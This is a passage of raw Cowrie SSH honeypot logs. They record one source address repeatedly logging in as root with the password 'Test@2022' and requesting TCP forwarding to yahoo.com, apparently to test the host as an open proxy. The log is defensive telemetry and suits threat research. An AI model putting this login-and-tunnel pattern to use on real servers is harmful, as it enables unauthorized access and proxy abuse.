ac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.594743Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.877545Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":8141,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:8141","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.935755Z","session":"ae5cdf427570"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:41.992666Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26882,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26882","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.147235Z","session":"ae5cdf427570"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.204072Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.261627Z","src_ip":"213.209.150.239","session":"ae5cdf427570"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23949,"dst_ip":"1.2.3.4","dst_port":22,"session":"ade6c5d9ee9f","protocol":"ssh","message":"New connection: 213.209.150.239:23949 (1.2.3.4:22) [session: ade6c5d9ee9f]","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.307886Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.308952Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.355793Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.590833Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":30998,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:30998","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.639492Z","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.686779Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":30002,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:30002","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.821609Z","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.869000Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.916897Z","src_ip":"213.209.150.239","session":"ade6c5d9ee9f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":23982,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c05f2c59fea","protocol":"ssh","message":"New connection: 213.209.150.239:23982 (1.2.3.4:22) [session: 8c05f2c59fea]","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.963019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:42.972004Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.010168Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.245237Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":16780,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:16780","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.293356Z","session":"8c05f2c59fea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.340533Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":18254,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:18254","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.485451Z","session":"8c05f2c59fea"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.532575Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.580739Z","src_ip":"213.209.150.239","session":"8c05f2c59fea"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24026,"dst_ip":"1.2.3.4","dst_port":22,"session":"1034c9bf1713","protocol":"ssh","message":"New connection: 213.209.150.239:24026 (1.2.3.4:22) [session: 1034c9bf1713]","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.637091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.638193Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.694984Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:43.977820Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":22243,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:22243","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.036041Z","session":"1034c9bf1713"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.092729Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":29106,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:29106","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.247114Z","session":"1034c9bf1713"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.303705Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.361159Z","src_ip":"213.209.150.239","session":"1034c9bf1713"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24085,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6695e0ac825","protocol":"ssh","message":"New connection: 213.209.150.239:24085 (1.2.3.4:22) [session: e6695e0ac825]","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.416907Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.417695Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.475026Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.757523Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24191,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24191","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.814986Z","session":"e6695e0ac825"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:44.871736Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":17937,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:17937","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.027155Z","session":"e6695e0ac825"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.084036Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.141758Z","src_ip":"213.209.150.239","session":"e6695e0ac825"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24142,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c08395cd786","protocol":"ssh","message":"New connection: 213.209.150.239:24142 (1.2.3.4:22) [session: 9c08395cd786]","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.197467Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.198476Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.255378Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.538200Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":16847,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:16847","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.595684Z","session":"9c08395cd786"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.652370Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":21610,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21610","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.807016Z","session":"9c08395cd786"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.863654Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.921087Z","src_ip":"213.209.150.239","session":"9c08395cd786"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":24174,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a04119def18","protocol":"ssh","message":"New connection: 213.209.150.239:24174 (1.2.3.4:22) [session: 9a04119def18]","sensor":"my-vps","timestamp":"2025-08-26T01:02:45.967225Z"}
